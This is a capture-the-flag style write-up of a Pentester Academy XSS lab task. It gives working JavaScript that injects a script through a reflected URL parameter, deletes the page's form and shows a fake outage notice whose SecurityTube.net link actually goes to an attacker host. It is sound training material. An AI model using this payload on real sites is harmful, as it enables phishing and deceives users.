XSS - Social Engineering: JS for Pentesters task 5 write up
Writeup for task 5 of the JS for Pentesters series by SecurityTube - Social Engineering
We have already seen some good challenges from Pentester Academy, like hijacking a form submit and adding a new form element. This challenge is a bit more exciting than the ones we have solved so far: let us try a social engineering technique with XSS.
JS for Pentesters task 5
The objective of this challenge is to remove the form and add a notification reading “Website is Down! Please visit SecurityTube.net”. Now let us see how we can solve this:
As always, there is an XSS vulnerability via the URL parameter. The first thing to do is remove the form: select the form element we want to remove, then insert a notification in its place saying that the website is down, with a link pointing to the attacker's server. The social engineering part is that the link text reads SecurityTube.net while the link itself goes wherever the attacker chooses. The payload looks like this:
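The following is an added example of such a payload and is not the writeup's original one. It assumes placeholders: a target page at http://target.test/task5 that reflects a `name` parameter unescaped into its HTML, and an attacker host at https://attacker.test. The `FakeNode` class is a constructed stand-in for the handful of DOM methods the payload calls, so the effect can be checked in Node without a browser; in the real challenge the script runs against the browser's own `document`.

```javascript
// Added example (not the writeup's original payload). Assumed placeholders:
// the vulnerable page http://target.test/task5 reflects the `name` parameter
// unescaped into its HTML, and the attacker controls https://attacker.test.

// 1. The script that will run in the victim's browser. It is built as one line,
//    and the attacker URL is quoted with JSON.stringify so that quotes or a '#'
//    in that URL cannot break out of the JavaScript string literal.
function makePayload(attackerUrl) {
  return (
    "var f=document.querySelector('form');" +
    "if(f){" +
    "var p=document.createElement('p');" +
    "p.textContent='Website is Down! Please visit ';" +
    "var a=document.createElement('a');" +
    "a.href=" + JSON.stringify(attackerUrl) + ";" +   // link target: the attacker
    "a.textContent='SecurityTube.net';" +             // link text: what the victim sees
    "p.appendChild(a);" +
    "f.parentNode.replaceChild(p,f);" +               // form removed, notice in its place
    "}"
  );
}

// 2. Wrap the script in <script> tags and percent-encode it into the vulnerable
//    parameter. URLSearchParams takes care of encoding '<', '>', quotes and spaces,
//    so the script survives the round trip through the browser and the server's reflection.
function buildInjectionUrl(targetUrl, param, attackerUrl) {
  const u = new URL(targetUrl);
  u.searchParams.set(param, "<script>" + makePayload(attackerUrl) + "</script>");
  return u.toString();
}

// 3. A constructed stand-in for the few DOM methods the payload calls, so the effect
//    can be checked offline in Node. textContent is rendered before child nodes, which
//    is all the payload needs; the browser's real document is used in the challenge.
class FakeNode {
  constructor(tag) {
    this.tag = tag; this.children = []; this.parentNode = null;
    this.textContent = ""; this.href = "";
  }
  createElement(tag) { return new FakeNode(tag); }
  appendChild(child) { child.parentNode = this; this.children.push(child); return child; }
  replaceChild(newNode, oldNode) {
    const i = this.children.indexOf(oldNode);
    if (i < 0) throw new Error("not a child");
    this.children[i] = newNode; newNode.parentNode = this; oldNode.parentNode = null;
    return oldNode;
  }
  querySelector(tag) {            // tag-name selectors only, depth-first like the DOM
    for (const c of this.children) {
      if (c.tag === tag) return c;
      const hit = c.querySelector(tag);
      if (hit) return hit;
    }
    return null;
  }
  render() {
    const attr = this.href ? ' href="' + this.href + '"' : "";
    return "<" + this.tag + attr + ">" + this.textContent +
      this.children.map(c => c.render()).join("") + "</" + this.tag + ">";
  }
}

// Constructed sample page: a body holding the form the challenge wants removed.
function buildSampleDocument() {
  const body = new FakeNode("body");
  const form = body.appendChild(new FakeNode("form"));
  form.appendChild(new FakeNode("input"));
  return body;
}

// Execute the payload against a document object and return the resulting markup.
function runPayload(doc, attackerUrl) {
  new Function("document", makePayload(attackerUrl))(doc);
  return doc.render();
}

console.log(buildInjectionUrl("http://target.test/task5", "name", "https://attacker.test"));
console.log(runPayload(buildSampleDocument(), "https://attacker.test"));
```

To try it against the challenge, paste the string returned by `buildInjectionUrl` into the address bar; the script only executes because the server reflects the parameter into the HTML without escaping, which is the vulnerability the task provides. The payload is also a no-op on a page without a form, so it does not throw a visible error if the selector misses.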
2) The solution written above is the way we cracked the problem, which might differ from the solution videos provided by SecurityTube. If you need the solution video, you have to subscribe to PentesterAcademy.
We hope that you liked this challenge. If there is anything you did not understand or want more clarity on, please comment below and we will be happy to help. Also, if you have a better way of solving the challenge, please share it with us; we are happy to learn from our readers too. Happy pentesting!